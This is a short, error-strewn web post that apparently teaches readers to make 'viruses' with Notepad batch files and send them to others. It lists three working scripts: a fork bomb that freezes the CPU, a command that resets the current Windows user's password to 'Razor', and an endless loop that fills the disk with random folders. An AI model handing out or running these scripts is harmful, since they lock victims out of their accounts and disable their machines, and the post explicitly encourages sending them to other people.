Hi I am share How to How to Create a Virus with Notepad Its really working. Make Virus and send
How to Create your Own Virus using Batch Scripting
All code open notepad and save .bat file
So lest start
1 Freezes the CPU
%0|%0
save cpu.bat
1 Change Computer Password
@echo off
::--Change Pass To Razor--::
net user %username% Razor
::---------------------------::
save anything.bat
Make an Infinity of Folders
@echo off
:ztuts
md %random%
goto ztuts
:ztuts
md %random%
goto ztuts